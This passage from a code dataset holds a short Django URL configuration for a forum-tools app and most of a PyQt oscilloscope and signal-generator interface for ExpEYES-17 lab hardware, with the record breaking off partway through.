"usage_type": "name"}, {"api_name": "lux.executor.PandasExecutor.PandasExecutor.execute", "line_number": 237, "usage_type": "call"}, {"api_name": "lux.executor.PandasExecutor.PandasExecutor", "line_number": 237, "usage_type": "name"}]} +{"seq_id": "518393632", "text": "from django.conf.urls import patterns, url\n\n# Everything is AJAX\nurlpatterns = patterns('forum_tools.views',\n\turl(r'^get_sync_data/$', 'get_sync_data'),\n\turl(r'^get_chat/$', 'get_chat'),\n url(r'^get_post_perm/$', 'get_posting_level'),\n url(r'^get_build_report_forums/$', 'get_build_report_forums'),\n\turl(r'^mods/get_data/$', 'get_mod_data'),\n url(r'^mods/get_sharing_perms/$', 'get_sharing_perms'),\n)\n", "sub_path": "forum_tools/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 419, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.patterns", "line_number": 4, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "393737293", "text": "# -*- coding: utf-8; mode: python; indent-tabs-mode: t; tab-width:4 -*-\nimport sys, time, math, os.path\n\nfrom QtVersion import *\n\nimport sys, time, utils\nimport pyqtgraph as pg\nimport numpy as np\nimport eyes17.eyemath17 as em\nfrom functools import partial\n\n\nclass Expt(QWidget):\n\tTIMER = 50\n\tloopCounter = 0\n\tAWGmin = 1\n\tAWGmax = 5000\n\tAWGval = 1000\n\tSQ1min = 0\n\tSQ1max = 5000\n\tSQ1val = 0\n\tPV1min = -5.0\n\tPV1max = 5.0\n\tPV1val = 0.0\n\tPV2min = -3.3\n\tPV2max = 3.3\n\tPV2val = 0.0\n\tWaves = ['sine', 'tria', 'SQR2']\n\tWgains = ['80 mV', '1V', '3V']\n\twaveindex = 0\n\twgainindex = 2\n\t\n\tRPVspacing = 3\t\t\t\t\t\t\t\t\t\t\t# Right panel Widget spacing\n\tRPWIDTH = 300\n\tLABW = 60\n\t\t\n\t# Scope parameters\n\tMAXCHAN = 4\n\tRanges12 = ['16 V', '8 V','4 V', '2.5 V', '1 V', '.5V']\t# Voltage ranges for A1 and A2\n\tRangeVals12 = [16., 8., 4., 2.5, 1., 0.5]\n\tRanges34 = ['4 V', '2 V', '1 V', '.5V']\t\t\t\t\t# Voltage ranges for A3 and MIC\n\tRangeVals34 = [4,2,1,0.5]\n\tchanStatus = [1,0,0,0]\n\ttimeData = [None]*4\n\tvoltData = [None]*4\n\tvoltDataFit = [None]*4\n\ttraceWidget = [None]*4\n\toffSliders = [None]*4\n\toffValues = [0] * 4\n\tDiffTraceW = None\n\tfitResWidget= [None]*4\n\tchanSelCB = [None]*4\n\trangeSelPB = [None]*4\n\tfitSelCB = [None]*4\n\tfitResLab = [None]*4\n\tfitFlags = [0]*4\n\tAmplitude = [0]*4\n\tFrequency = [0]*4\n\tPhase = [0]*4\n\trangeVals = [4]*4\t\t# selected value of range\n\trangeTexts = ['4 V']*4\t\t# selected value of range\n\tscaleLabs = [None]*4 # display fullscale value inside pg\n\tvoltMeters = [None]*3\n\tvoltMeterCB = [None]*3\n\tvalueLabel = None\n\t\n\tsources = ['A1','A2','A3', 'MIC']\t\n\n\ttbvals = [0.100, 0.200, 0.500, 1.0, 2.0, 5.0, 10.0, 20.0, 50.0]\t# allowed mS/div values\n\tNP = 500\t\t\t# Number of samples\n\tTG = 1\t\t\t\t# Number of channels\n\tMINDEL = 1\t\t\t# minimum time between samples, in usecs\n\tMAXDEL = 1000\n\tdelay = MINDEL\t\t# Time interval between samples\n\tTBval = 1\t\t\t# timebase list index\n\tTrigindex = 0\n\tTriglevel = 0\n\tdutyCycle = 50\n\tMAXRES = 5\n\tresLabs = [None]*MAXRES\n\tResults = [None]*MAXRES\n\n\t\t\n\n\tdef recover(self):\t\t# Recover the settings before it got disconnected\n\t\ttry:\n\t\t\tself.control_od1()\n\t\t\tself.pv1_text('0')\n\t\t\tself.pv2_text('0')\n\t\t\tself.p.set_sqr1(self.SQ1val, self.dutyCycle)\n\t\t\tself.select_wave(self.waveindex)\n\t\t\tself.p.set_wave(self.AWGval)\n\t\t\tself.select_wgain(self.wgainindex)\n\t\t\tself.set_trigger(self.Triglevel*1000)\n\t\t\tself.p.set_sine(self.AWGval)\n\t\t\tself.p.configure_trigger(0, 'A1', 0)\n\t\t\tself.select_range((0,2))\n\t\t\tself.select_range((1,2))\n\t\t\tself.select_range((2,0))\n\t\t\tself.select_range((3,0))\n\t\texcept:\n\t\t\tpass\n\t\t\n\tdef cross_hair(self):\n\t\tif self.Cross.isChecked() == False:\n\t\t\tself.pwin.vLine.setPos(-1)\n\t\t\tself.pwin.hLine.setPos(-17)\n\n\tdef updateTV(self, evt):\n\t\tif self.p == None: return\n\t\tpos = evt[0] \t\t\t## using signal proxy turns original arguments into a tuple\n\t\tif self.pwin.sceneBoundingRect().contains(pos):\n\t\t\tmousePoint = self.pwin.vb.mapSceneToView(pos)\n\t\t\txval = mousePoint.x()\n\n\t\t\tif self.Cross.isChecked() == True:\n\t\t\t\tself.pwin.vLine.setPos(mousePoint.x())\n\t\t\t\tself.pwin.hLine.setPos(mousePoint.y())\n\n\t\t\tfor k in range(self.MAXRES):\n\t\t\t\tself.pwin.removeItem(self.resLabs[k])\n\t\t\t\n\t\t\tt = self.timeData[0]\n\t\t\tindex = 0\n\t\t\tfor k in range(len(t)-1):\t\t# find out Time at the cursor position\n\t\t\t\tif t[k] < xval < t[k+1]:\n\t\t\t\t\tindex = k\n\t\t\t\n\t\t\tself.resLabs[0] = pg.TextItem(\n\t\t\t\ttext= unicode(self.tr('Time: %6.2fmS ')) %t[index],\n\t\t\t\tcolor= self.resultCols[0]\n\t\t\t)\n\t\t\tself.resLabs[0].setPos(0, -11)\n\t\t\tself.pwin.addItem(self.resLabs[0])\n\t\t\t\n\t\t\tfor k in range(self.MAXCHAN):\n\t\t\t\tif self.chanStatus[k] == 1:\n\t\t\t\t\tself.Results[k+1] = unicode(self.tr('%s:%6.2fV ')) %(self.sources[k],self.voltData[k][index])\n\t\t\t\t\tself.resLabs[k+1] = pg.TextItem(text= self.Results[k+1],\tcolor= self.resultCols[k])\n\t\t\t\t\tself.resLabs[k+1].setPos(0, -12 - 1.0*k)\n\t\t\t\t\tself.pwin.addItem(self.resLabs[k+1])\n\n\t\t\t\n\tdef set_offset(self, ch):\n\t\tself.offValues[ch] = self.offSliders[ch].value()\n\t\t\n\tdef __init__(self, device=None):\n\t\tQWidget.__init__(self)\n\t\t\n\t\tself.resultCols = utils.makeResultColors()\n\t\tself.traceCols = utils.makeTraceColors()\n\t\tself.htmlColors = utils.makeHtmlColors()\n\t\tself.p = device\t\t\t\t\t\t# connection to the device hardware \n\t\t\t\n\t\tself.chanStatus = [1,0,0,0]\t\t\t# PyQt problem. chanStatus somehow getting preserved ???\t\t\n\n\t\tleft = QVBoxLayout()\t\t\t\t# right side vertical layout\n\t\tfor ch in range(self.MAXCHAN):\n\t\t\tself.offSliders[ch] = utils.sliderVert(-4, 4, 0, 40, None)\n\t\t\tleft.addWidget(self.offSliders[ch])\n\t\t\tself.offSliders[ch].valueChanged.connect(partial (self.set_offset,ch))\n\t\t\tself.offSliders[ch].setStyleSheet(\"border: 1px solid %s;\"%self.htmlColors[ch])\n\t\t\n\n\t\twin = pg.GraphicsWindow()\n\t\tself.pwin = win.addPlot()\n\t\tself.pwin.proxy = pg.SignalProxy(self.pwin.scene().sigMouseMoved, rateLimit=60, slot=self.updateTV)\t\t\t\t\n\t\tself.pwin.showGrid(x=True, y=True)\t\t\t\t\t\t# with grid\n\t\t\n\n\t\tfor k in range(self.MAXCHAN):\t\t\t\t\t\t\t# pg textItem to show the voltage scales\n\t\t\tself.scaleLabs[k] = pg.TextItem(text='')\n\n\t\tfor k in range(self.MAXRES):\t\t\t\t\t\t# pg textItem to show the Results\n\t\t\tself.resLabs[k] = pg.TextItem()\n\t\t\tself.pwin.addItem(self.resLabs[k])\n\t\t\n\t\tvLine = pg.InfiniteLine(angle=90, movable=False, pen = 'w')\n\t\tself.pwin.addItem(vLine, ignoreBounds=True)\n\t\tself.pwin.vLine=vLine\n\t\tself.pwin.vLine.setPos(-1)\n\t\thLine = pg.InfiniteLine(angle=0, movable=False, pen = 'w')\n\t\tself.pwin.addItem(hLine, ignoreBounds=True)\n\t\tself.pwin.hLine=hLine\n\t\tself.pwin.hLine.setPos(-17)\n\t\t\n\t\tax = self.pwin.getAxis('bottom')\n\t\tax.setLabel(self.tr('Time (mS)'))\t\n\t\tax = self.pwin.getAxis('left')\n\t\tax.setStyle(showValues=False)\n\t\tax.setLabel(self.tr('Voltage'))\n\t\t\n\t\tself.set_timebase(self.TBval)\n\t\tself.pwin.disableAutoRange()\n\t\tself.pwin.setXRange(0, self.tbvals[self.TBval]*10)\n\t\tself.pwin.setYRange(-16, 16)\n\t\tself.pwin.hideButtons()\t\t\t\t\t\t\t\t\t# Do not show the 'A' button of pg\n\n\t\tfor ch in range(self.MAXCHAN):\t\t\t\t\t\t\t# initialize the pg trace widgets\n\t\t\tself.traceWidget[ch] = self.pwin.plot([0,0],[0,0], pen = self.traceCols[ch])\n\t\tself.diffTraceW = self.pwin.plot([0,0],[0,0], pen = self.traceCols[-1])\n\n\t\tright = QVBoxLayout()\t\t\t\t\t\t\t# right side vertical layout\n\t\tright.setAlignment(Qt.AlignTop)\n\t\tright.setSpacing(self.RPVspacing)\t\t\n\n\t\tl = QLabel(text= '' +self.tr('DC Voltages at A1, A2 and A3'))\n\t\tl.setMinimumWidth(self.RPWIDTH)\n\t\tright.addWidget(l)\n\n\t\tH = QHBoxLayout()\n\t\tfor k in range(3):\n\t\t\tH.setAlignment(Qt.AlignLeft)\n\t\t\tself.voltMeterCB[k] = QCheckBox(self.tr(self.sources[k]))\n\t\t\tH.addWidget(self.voltMeterCB[k])\n\t\t\tself.voltMeters[k] = QLabel()\n\t\t\tself.voltMeters[k].setMinimumWidth(50)\n\t\t\tH.addWidget(self.voltMeters[k])\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('Resistance on SEN = '))\n\t\tH.addWidget(l)\n\t\tself.RES = QLabel()\n\t\tH.addWidget(self.RES)\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tb = QPushButton(self.tr(\"Click for Capacitance on IN1\"))\n\t\tb.setMinimumWidth(200)\n\t\tH.addWidget(b)\n\t\tb.clicked.connect(self.measure_cap)\n\t\tself.CAP = QLabel('')\n\t\tH.addWidget(self.CAP)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tb = QPushButton(self.tr(\"Click for Frequency on IN2\"))\n\t\tb.setMinimumWidth(200)\n\t\tH.addWidget(b)\n\t\tb.clicked.connect(self.measure_freq)\n\t\tself.IN2 = QLabel('')\n\t\tH.addWidget(self.IN2)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tself.OD1 = QCheckBox(self.tr(\"Enable OD1\"))\n\t\tH.addWidget(self.OD1)\n\t\tself.OD1.stateChanged.connect(self.control_od1)\n\t\tself.CCS = QCheckBox(self.tr(\"Enable CCS\"))\n\t\tH.addWidget(self.CCS)\n\t\tself.CCS.stateChanged.connect(self.control_ccs)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('WG Shape'))\n\t\tH.addWidget(l)\n\t\tself.Wshape = QPushButton('sine')\n\t\tmenu = QMenu()\n\t\tfor k in range(len(self.Waves)):\n\t\t\tmenu.addAction(self.Waves[k], lambda index=k: self.select_wave(index))\n\t\tself.Wshape.setMenu(menu)\n\t\tH.addWidget(self.Wshape)\n\n\t\tl = QLabel(text=self.tr('Amplitude'))\n\t\tH.addWidget(l)\n\n\t\tself.Wgain = QPushButton(self.Wgains[self.wgainindex])\n\t\tmenu = QMenu()\n\t\tfor k in range(len(self.Wgains)):\n\t\t\tmenu.addAction(self.Wgains[k], lambda index=k: self.select_wgain(index))\n\t\tself.Wgain.setMenu(menu)\n\t\tH.addWidget(self.Wgain)\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('WG'))\n\t\tl.setMaximumWidth(30)\n\t\tH.addWidget(l)\n\t\tself.AWGslider = utils.slider(self.AWGmin, self.AWGmax, self.AWGval,100,self.awg_slider)\n\t\tH.addWidget(self.AWGslider)\n\t\tself.AWGtext = utils.lineEdit(100, self.AWGval, 6, self.awg_text)\n\t\tH.addWidget(self.AWGtext)\n\t\tl = QLabel(text=self.tr('Hz'))\n\t\tl.setMaximumWidth(40)\n\t\tl.setMinimumWidth(40)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('SQ1'))\n\t\tl.setMaximumWidth(30)\n\t\tl.setMinimumWidth(30)\n\t\tH.addWidget(l)\n\t\tself.SQ1slider = utils.slider(self.SQ1min, self.SQ1max, self.SQ1val,100,self.sq1_slider)\n\t\tH.addWidget(self.SQ1slider)\n\t\tself.SQ1text = utils.lineEdit(60, self.SQ1val, 6, self.sq1_text)\n\t\tH.addWidget(self.SQ1text)\n\t\tl = QLabel(text=self.tr('Hz'))\n\t\tl.setMaximumWidth(15)\n\t\tH.addWidget(l)\n\t\tself.SQ1DCtext = utils.lineEdit(30, 50, 6, self.sq1_dc)\n\t\tH.addWidget(self.SQ1DCtext)\n\t\tl = QLabel(text=self.tr('%'))\n\t\tl.setMaximumWidth(15)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('PV1'))\n\t\tl.setMaximumWidth(25)\n\t\tH.addWidget(l)\n\t\t\n\t\tself.PV1slider = utils.slider(self.PV1min*1000, self.PV1max*1000, self.PV1val*1000,100,self.pv1_slider)\n\t\tH.addWidget(self.PV1slider)\n\t\t\n\t\tself.PV1text = utils.lineEdit(100, self.PV1val, 6, self.pv1_text)\n\t\tH.addWidget(self.PV1text)\n\t\tl = QLabel(text=self.tr('Volt'))\n\t\tl.setMaximumWidth(40)\n\t\tl.setMinimumWidth(40)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('PV2'))\n\t\tl.setMaximumWidth(25)\n\t\tH.addWidget(l)\n\n\t\tself.PV2slider = utils.slider(self.PV2min*1000, self.PV2max*1000, self.PV2val*1000,100,self.pv2_slider)\n\t\tH.addWidget(self.PV2slider)\n\t\t\n\t\tself.PV2text = utils.lineEdit(100, self.PV2val, 6, self.pv2_text)\n\t\tH.addWidget(self.PV2text)\n\t\tl = QLabel(text=self.tr('Volt'))\n\t\tl.setMaximumWidth(40)\n\t\tl.setMinimumWidth(40)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\t\t\n\t\t#--------------------------Scope Controls---------------------\n\t\tl = QLabel('' +self.tr('Oscilloscope Channels, Range and Analysis '))\n\t\tright.addWidget(l)\n\n\t\tfor ch in range(4):\n\t\t\tH = QHBoxLayout()\n\t\t\tH.setAlignment(Qt.AlignLeft)\n\t\t\tself.chanSelCB[ch] = QCheckBox()\n\t\t\tself.chanSelCB[ch].stateChanged.connect(partial (self.select_channel,ch))\n\t\t\tH.addWidget(self.chanSelCB[ch])\n\n\t\t\tl = QLabel(text='%s'%(self.htmlColors[ch],self.sources[ch]))\t\t\n\t\t\tl.setMaximumWidth(30)\n\t\t\tl.setMinimumWidth(30)\n\t\t\tH.addWidget(l)\n\t\t\t\n\t\t\tself.rangeSelPB[ch] = QPushButton('4 V')\n\t\t\tself.rangeSelPB[ch].setMaximumWidth(60)\n\t\t\tmenu = QMenu()\n\t\t\tif ch <= 1:\n\t\t\t\tfor k in range(len(self.Ranges12)):\n\t\t\t\t\tmenu.addAction(self.Ranges12[k], lambda index=(ch,k): self.select_range(index))\n\t\t\telse:\t\n\t\t\t\tfor k in range(len(self.Ranges34)):\n\t\t\t\t\tmenu.addAction(self.Ranges34[k], lambda index=(ch,k): self.select_range(index))\n\t\t\tself.rangeSelPB[ch].setMenu(menu)\n\t\t\tH.addWidget(self.rangeSelPB[ch])\n\t\t\tself.fitSelCB[ch] = QCheckBox('')\n\t\t\tself.fitSelCB[ch].setMaximumWidth(30)\n\t\t\tH.addWidget(self.fitSelCB[ch])\n\t\t\tself.fitResLab[ch] = QLabel('') \n\t\t\tH.addWidget(self.fitResLab[ch])\n\t\t\tright.addLayout(H)\n\t\tself.chanSelCB[0].setChecked(True)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('Timebase'))\n\t\tl.setMaximumWidth(60)\n\t\tH.addWidget(l)\n\t\tself.TBslider = utils.slider(0, 8, self.TBval, 180, self.set_timebase)\n\t\tH.addWidget(self.TBslider)\n\t\tl = QLabel(text=self.tr('mS/div'))\n\t\tl.setMaximumWidth(60)\n\t\tH.addWidget(l)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tl = QLabel(text=self.tr('Trigger'))\n\t\tl.setMaximumWidth(60)\n\t\tH.addWidget(l)\n\t\tself.Trigslider = utils.slider(-3300, 3300, self.Triglevel, 150, self.set_trigger)\n\t\tH.addWidget(self.Trigslider)\n\t\tl = QLabel(text=self.tr('On'))\n\t\tl.setMaximumWidth(30)\n\t\tH.addWidget(l)\t\n\t\tself.Trigbutton = QPushButton(self.tr('A1'))\n\t\tself.Trigbutton.setMaximumWidth(50)\n\t\tmenu = QMenu()\n\t\tfor k in range(len(self.sources)):\n\t\t\tmenu.addAction(self.sources[k], lambda index=k :self.select_trig_source(index))\n\t\tself.Trigbutton.setMenu(menu)\n\t\tH.addWidget(self.Trigbutton)\n\t\tright.addLayout(H)\n\n\t\tH = QHBoxLayout()\n\t\tself.SaveButton = QPushButton(self.tr(\"Save Traces\"))\n\t\t#self.SaveButton.setMaximumWidth(80)\n\t\tself.SaveButton.clicked.connect(self.save_data)\t\t\n\t\tH.addWidget(self.SaveButton)\n\t\t\t\n\t\t#self.Filename = utils.lineEdit(100, self.tr('scope.txt'), 20, None)\n\t\t#H.addWidget(self.Filename)\n\t\t\n\t\tself.FFT = QPushButton(self.tr(\"Fourier Transform\"))\n\t\t#self.FFT.setMaximumWidth(50)\n\t\tH.addWidget(self.FFT)\n\t\tself.FFT.clicked.connect(self.show_fft)\t\t\n\t\n\t\tright.addLayout(H)\n\t\t\n\t\tH = QHBoxLayout()\n\t\tself.Cross = QCheckBox(self.tr(\"Cross hair\"))\n\t\tself.Cross.stateChanged.connect(self.cross_hair)\n\t\tH.addWidget(self.Cross)\n\n\t\tself.Freeze = QCheckBox(self.tr(\"Freeze\"))\n\t\tH.addWidget(self.Freeze)\n\t\tself.Diff = QCheckBox(self.tr('A1-A2'))\n\t\tH.addWidget(self.Diff)\n\t\tself.Diff.stateChanged.connect(self.show_diff)\n\t\tright.addLayout(H)\n\n\t\t#------------------------end of right panel ----------------\n\t\t\n\t\ttop = QHBoxLayout()\n\t\ttop.addLayout(left)\n\t\ttop.addWidget(win)# self.pwin)\n\t\ttop.addLayout(right)\n\t\t\n\t\tfull = QVBoxLayout()\n\t\tfull.addLayout(top)\n\t\tself.msgwin = QLabel(text=self.tr('messages'))\n\t\tfull.addWidget(self.msgwin)\n\t\t\t\t\n\t\tself.setLayout(full)\n\t\t\n\t\tself.timer = QTimer()\n\t\tself.timer.timeout.connect(self.update)\n\t\tself.timer.start(self.TIMER)\n\n\t\tself.recover()\n\t\t#----------------------------- end of init ---------------\n\t\n\t\n\tdef update(self):\n\t\tif self.Freeze.isChecked(): return\n\n\t\ttry:\n\t\t\tif self.chanStatus[2] == 1 or self.chanStatus[3] == 1: # channel 3 or 4 selected \t\n\t\t\t\tself.timeData[0], self.voltData[0],\t\\\n\t\t\t\tself.timeData[1], self.voltData[1], \\\n\t\t\t\tself.timeData[2], self.voltData[2], \\\n\t\t\t\tself.timeData[3], self.voltData[3] = self.p.capture4(self.NP, self.TG)\t\t\t\t\n\t\t\telif self.chanStatus[1] == 1: \t# channel 2 is selected \t\n\t\t\t\tself.timeData[0], self.voltData[0], \\\n\t\t\t\tself.timeData[1], self.voltData[1] = self.p.capture2(self.NP, self.TG)\n\t\t\telif self.chanStatus[0] == 1: \t\t# only A1 selected\n\t\t\t\tself.timeData[0], self.voltData[0] = self.p.capture1('A1', self.NP, self.TG)\n\t\texcept:\n\t\t\tself.comerr()\n\t\t\treturn\n\t\t\t\n\t\tfor ch in range(4):\n\t\t\tif self.chanStatus[ch] == 1:\n\t\t\t\tr = 16./self.rangeVals[ch]\n\t\t\t\tself.traceWidget[ch].setData(self.timeData[ch], self.voltData[ch] * r + 4*self.offValues[ch] )\n\t\t\t\tif np.max(self.voltData[ch]) > self.rangeVals[ch]:\n\t\t\t\t\tself.msg(unicode(self.tr('%s input is clipped. Increase range')) %self.sources[ch])\n\n\t\t\t\tif self.fitSelCB[ch].isChecked() == True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfa = em.fit_sine(self.timeData[ch],self.voltData[ch])\n\t\t\t\t\texcept Exception as err:\n\t\t\t\t\t\tprint('fit_sine error:', err)\n\t\t\t\t\t\tfa=None\n\t\t\t\t\tif fa != None:\n\t\t\t\t\t\tself.voltDataFit[ch] = fa[0]\n\t\t\t\t\t\tself.Amplitude[ch] = abs(fa[1][0])\n\t\t\t\t\t\tself.Frequency[ch] = fa[1][1]*1000\n\t\t\t\t\t\tself.Phase[ch] = fa[1][2] * 180/em.pi\n\t\t\t\t\t\ts = unicode(self.tr('%5.2f V, %5.1f Hz')) %(self.Amplitude[ch],self.Frequency[ch])\n\t\t\t\t\t\tself.fitResLab[ch].setText(s)\n\t\t\t\telse:\n\t\t\t\t\tself.fitResLab[ch].setText('')\n\n\t\tif self.Diff.isChecked() == True and self.chanStatus[0] == 1 and self.chanStatus[1] == 1:\n\t\t\tr = 16./self.rangeVals[0]\n\t\t\tself.diffTraceW.setData(self.timeData[0], r*(self.voltData[0]-self.voltData[1]))\n\n\t\tself.loopCounter += 1\n\t\tif self.loopCounter % 5 == 0:\n\t\t\tfor ch in range(3):\n\t\t\t\tif self.voltMeterCB[ch].isChecked() == True:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tv = self.p.get_voltage(self.sources[ch])\t\t# Voltmeter functions\n\t\t\t\t\texcept:\n\t\t\t\t\t\tself.comerr()\n\n\t\t\t\t\tself.voltMeters[ch].setText(unicode(self.tr('%5.3f V')) %(v))\n\t\t\t\telse:\n\t\t\t\t\tself.voltMeters[ch].setText(self.tr(''))\t\t\t\n\t\t\ttry:\n\t\t\t\tres = self.p.get_resistance()\n\t\t\t\tif res != np.Inf and res > 100 and res < 100000:\n\t\t\t\t\tself.RES.setText(''+unicode(self.tr('%5.0f Ohm')) %(res))\n\t\t\t\telse:\n\t\t\t\t\tself.RES.setText(self.tr('<100Ohm or >100k'))\n\t\t\t\tself.p.select_range('A1', self.rangeVals[0])\n\t\t\t\tself.p.select_range('A2', self.rangeVals[1])\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t# End of update\n\n\n\tdef show_diff(self):\n\t\tif self.Diff.isChecked() == False:\n\t\t\t\tself.diffTraceW.setData([0,0], [0,0])\n\t\n\tdef showRange(self, ch):\n\t\tspacing = self.tbvals[self.TBval]\n\t\tself.pwin.removeItem(self.scaleLabs[ch])\n\t\tif self.chanStatus[ch] == 0: \n\t\t\treturn\n\t\tself.scaleLabs[ch] = pg.TextItem(text=self.rangeTexts[ch],\tcolor= self.resultCols[ch], angle=315)\n\t\tself.scaleLabs[ch].setPos(ch*spacing/3, 15.5)\n\t\t#self.scaleLabs[ch].setText('hello')\n\t\tself.pwin.addItem(self.scaleLabs[ch])\n\n\tdef select_channel(self, ch):\n\t\tif self.chanSelCB[ch].isChecked() == True:\n\t\t\tself.chanStatus[ch] = 1\n\t\t\tself.traceWidget[ch] = self.pwin.plot([0,0],[0,0], pen=self.traceCols[ch])\n\t\telse:\n\t\t\tself.chanStatus[ch] = 0\n\t\t\tself.pwin.removeItem(self.traceWidget[ch])\n\t\tself.showRange(ch)\n\n\tdef select_range(self,info):\n\t\tch = info[0]\n\t\tindex = info[1]\n\t\tif ch <= 1:\n\t\t\tself.rangeTexts[ch] = self.Ranges12[index]\n\t\t\tself.rangeVals[ch] = self.RangeVals12[index]\n\t\t\ttry:\n\t\t\t\tself.p.select_range(self.sources[ch], self.RangeVals12[index])\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\t\t\t\treturn\t\t\n\t\telse:\n\t\t\tself.rangeTexts[ch] = self.Ranges34[index]\n\t\t\tself.rangeVals[ch] = self.RangeVals34[index]\n\t\tself.rangeSelPB[ch].setText(self.rangeTexts[ch])\n\t\tself.showRange(ch)\n\t\tss1 = '%s'%self.sources[ch]\n\t\tss2 = '%s'%self.rangeTexts[ch]\n\t\tself.msg(self.tr('Range of') + ss1 + self.tr(' set to ') + ss2)\n\t\n\n\tdef show_fft(self):\n\t\tfor ch in range(4):\n\t\t\tif self.chanStatus[ch] == 1:\n\t\t\t\ttry:\t\n\t\t\t\t\tfa = em.fit_sine(self.timeData[ch],self.voltData[ch])\n\t\t\t\texcept Exception as err:\n\t\t\t\t\tprint('fit_sine error:', err)\n\t\t\t\t\tfa=None\n\t\t\t\tif fa != None:\n\t\t\t\t\tfr = fa[1][1]*1000\t\t\t# frequency in Hz\n\t\t\t\t\tdt = int(1.e6/ (20 * fr))\t# dt in usecs, 20 samples per cycle\n\t\t\t\t\ttry:\n\t\t\t\t\t\tt,v = self.p.capture1(self.sources[ch], 3000, dt)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tself.comerr()\n\n\t\t\t\t\txa,ya = em.fft(v,dt)\n\t\t\t\t\txa *= 1000\n\t\t\t\t\tpeak = self.peak_index(xa,ya)\n\t\t\t\t\typos = np.max(ya)\n\t\t\t\t\tpop = pg.plot(xa,ya, pen = self.traceCols[ch])\n\t\t\t\t\tpop.showGrid(x=True, y=True)\n\t\t\t\t\ttxt = pg.TextItem(text=unicode(self.tr('Fundamental frequency = %5.1f Hz')) %peak, color = 'w')\n\t\t\t\t\ttxt.setPos(peak, ypos)\n\t\t\t\t\tpop.addItem(txt)\n\t\t\t\t\tpop.setWindowTitle(self.tr('Frequency Spectrum'))\n\t\t\t\telse:\n\t\t\t\t\tself.msg(self.tr('FFT Error'))\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\tdef peak_index(self, xa, ya):\n\t\tpeak = 0\n\t\tpeak_index = 0\n\t\tfor k in range(2,len(ya)):\n\t\t\tif ya[k] > peak:\n\t\t\t\tpeak = ya[k]\n\t\t\t\tpeak_index = xa[k]\n\t\treturn peak_index\n\t\t\n\tdef save_data(self):\n\t\tself.timer.stop()\n\t\tfn = QFileDialog.getSaveFileName()\n\t\tif fn != '':\n\t\t\tdat = []\n\t\t\tfor ch in range(4):\n\t\t\t\tif self.chanStatus[ch] == 1:\n\t\t\t\t\tdat.append( [self.timeData[ch], self.voltData[ch] ])\n\t\t\tself.p.save(dat,fn)\n\t\t\tss = unicode(fn)\n\t\t\tself.msg(self.tr('Traces saved to ') + ss)\n\t\tself.timer.start(self.TIMER)\n\n\n\tdef select_trig_source(self, index):\n\t\tself.Trigindex = index\n\t\tsrc = self.sources[self.Trigindex]\n\t\tself.Trigbutton.setText(self.sources[self.Trigindex])\n\t\ttry:\n\t\t\tself.p.configure_trigger(self.Trigindex, self.sources[self.Trigindex], self.Triglevel)\n\t\texcept:\n\t\t\tself.comerr()\n\n\tdef set_trigger(self, tr):\n\t\tself.Triglevel = tr * 0.001\t\t# convert to volts\n\t\ttry:\n\t\t\tif self.TBval > 3:\n\t\t\t\tself.p.configure_trigger(self.Trigindex, self.sources[self.Trigindex], self.Triglevel,resolution=10,prescaler=5)\n\t\t\telse:\n\t\t\t\tself.p.configure_trigger(self.Trigindex, self.sources[self.Trigindex], self.Triglevel)\n\t\texcept:\n\t\t\tself.comerr()\n\t\t\t\n\tdef set_timebase(self, tb):\n\t\tself.TBval = tb\n\t\tself.pwin.setXRange(0, self.tbvals[self.TBval]*10)\n\t\tmsperdiv = self.tbvals[int(tb)]\t\t\t\t#millisecs / division\n\t\ttotalusec = msperdiv * 1000 * 10.0 \t# total 10 divisions\n\t\tself.TG = int(totalusec/self.NP)\n\t\tif self.TG < self.MINDEL:\n\t\t\tself.TG = self.MINDEL\n\t\telif self.TG > self.MAXDEL:\n\t\t\tself.TG = self.MAXDEL\n\t\tfor k in range(self.MAXCHAN):\n\t\t\tself.showRange(k)\n\n\tdef pv1_text(self, text):\n\t\ttry:\n\t\t\tval = float(text)\n\t\texcept:\n\t\t\treturn\n\t\tval = float(text)\n\t\tif self.PV1min <= val <= self.PV1max:\n\t\t\tself.PV1val = val\n\t\t\ttry:\n\t\t\t\tself.p.set_pv1(val)\n\t\t\t\tself.PV1slider.setValue(int(val*1000))\n\t\t\texcept:\n\t\t\t\tself.comerr()\n\n\tdef pv1_slider(self, pos):\n\t\tval = float(pos)/1000.0\n\t\tif self.PV1min <= val <= self.PV1max:\n\t\t\tself.PV1val = 